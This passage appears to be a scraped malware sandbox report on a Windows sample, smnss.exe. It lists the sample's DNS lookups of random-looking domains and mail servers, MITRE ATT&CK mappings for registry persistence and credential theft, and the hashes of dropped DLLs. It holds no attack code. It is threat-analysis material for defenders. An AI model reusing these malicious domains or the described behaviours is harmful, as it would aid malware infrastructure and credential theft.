mx-in-sg.apple.com

DNS Response

17.23.14.18
8.8.8.8:53

pqarnhhhhn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pqarnhhhhn.in
8.8.8.8:53

hqepnmqewn.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hqepnmqewn.net
8.8.8.8:53

rsrsemnren.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rsrsemnren.org

DNS Response

216.245.214.85
8.8.8.8:53

spewqmspma.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

spewqmspma.biz
8.8.8.8:53

rahhhqwqqa.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rahhhqwqqa.org

DNS Response

162.249.65.106
8.8.8.8:53

tse1.mm.bing.net

dns

124 B
170 B
2
1

DNS Request

tse1.mm.bing.net

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

85.214.245.216.in-addr.arpa

dns

73 B
125 B
1
1

DNS Request

85.214.245.216.in-addr.arpa
8.8.8.8:53

mx02.earthlink-vadesecure.net

dns

smnss.exe

75 B
91 B
1
1

DNS Request

mx02.earthlink-vadesecure.net

DNS Response

51.81.61.71
8.8.8.8:53

mxa-00377f01.gslb.pphosted.com

dns

smnss.exe

76 B
92 B
1
1

DNS Request

mxa-00377f01.gslb.pphosted.com

DNS Response

185.132.181.97
8.8.8.8:53

empewsqsqa.ws

dns

smnss.exe

59 B
75 B
1
1

DNS Request

empewsqsqa.ws

DNS Response

64.70.19.203
8.8.8.8:53

pmnrrneaah.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pmnrrneaah.in
8.8.8.8:53

mnwsnarssr.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mnwsnarssr.in
8.8.8.8:53

rrpnmeawrs.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rrpnmeawrs.org

DNS Response

162.249.65.106
8.8.8.8:53

sermsqqqna.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

sermsqqqna.biz
8.8.8.8:53

rsqsepmwas.org

dns

smnss.exe

120 B
76 B
2
1

DNS Request

rsqsepmwas.org

DNS Request

rsqsepmwas.org

DNS Response

162.249.65.106
8.8.8.8:53

mqpppnhaes.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mqpppnhaes.in
8.8.8.8:53

aqmrnawpan.com

dns

smnss.exe

60 B
133 B
1
1

DNS Request

aqmrnawpan.com
8.8.8.8:53

wrnwernreh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wrnwernreh.in
8.8.8.8:53

aeaqmpsaqa.com

dns

smnss.exe

120 B
133 B
2
1

DNS Request

aeaqmpsaqa.com

DNS Request

aeaqmpsaqa.com
8.8.8.8:53

aspmx3.googlemail.com

dns

smnss.exe

67 B
83 B
1
1

DNS Request

aspmx3.googlemail.com

DNS Response

142.250.153.26
8.8.8.8:53

whwsqnemsn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

whwsqnemsn.in
8.8.8.8:53

rqeaqeewas.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rqeaqeewas.org

DNS Response

162.249.65.106

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\ctfmen.exe

Filesize
4KB

MD5
1aff6813687186544826e950c841883c

SHA1
ad0b0e72581b64443cfd594dd537e142e7132b3c

SHA256
ad05d19c981aac6a295f8740b6d36003cbc78a0ea281ee6d8efe185006918acb

SHA512
bafb33a184072a842bf34498dd3087490520aefc1e91113d392ff62210f329d5140979fc596b4ed5c31a14b1d65654d7d844d6ae07317db989d81b00c28e71dc

Download Submit
C:\Windows\SysWOW64\grcopy.dll

Filesize
75KB

MD5
9e61589db36a16a96a9ce892b756898c

SHA1
dda6bf15f834907cd580f7e11242e9ecb03e75d0

SHA256
43d9dd97e36238bc1565c537c12d92a06e454f131d708b5db6a2922b04503fc0

SHA512
5ca430a5a65577607307dcce63e35382fc304cfee0779d41261b3a44f61637d241efb073aed603f07422488150d0ac2bd1b33a96ce41a039ff50bbe97162356c

Download Submit
C:\Windows\SysWOW64\satornas.dll

Filesize
183B

MD5
dd9b4714c51bbf0c4ccced53c06584dc

SHA1
eec17c6a1df9432b348191386db2d7144bf590f6

SHA256
cf6ef18f11ff41d3283553074414a2cc93d43c513e7cd73de42e87ad04b7b8d1

SHA512
09aba614dacb2ee107aee94043c69a8c577722b32f8b242ac3a6d2f36688fcbf94cd0ab2f540c0cddb2216eef531e01e1f648b04a152e669bac8949e1500e956

Download Submit
C:\Windows\SysWOW64\shervans.dll

Filesize
8KB

MD5
61304526f92380088f7d517651514bfd

SHA1
5742218741c00b38a231d1cdc56a34b04dadc66f

SHA256
5b73840a6e9414a9caaca9922acc5b4051c2a28aab2a6e5d2264030219b9210f

SHA512
c8ae3940bc5415859feb9e4d4ec153ed4d0986a34cc4ec5996b1dddae3e3a76317171d401240c3c7e229f47b283803540a00bb512ddac6aed2d0bd9e306c79c9

Download Submit
memory/2508-23-0x0000000010000000-0x000000001000D000-memory.dmp

Filesize
52KB

Download
memory/2508-21-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2508-12-0x0000000010000000-0x000000001000D000-memory.dmp

Filesize
52KB

Download
memory/3124-20-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3124-28-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4092-37-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-35-0x0000000010000000-0x000000001000D000-memory.dmp

Filesize
52KB

Download
memory/4092-38-0x0000000010000000-0x000000001000D000-memory.dmp

Filesize
52KB

Download
memory/4092-39-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-41-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-43-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-45-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-47-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-49-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-51-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-53-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-55-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4092-57-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request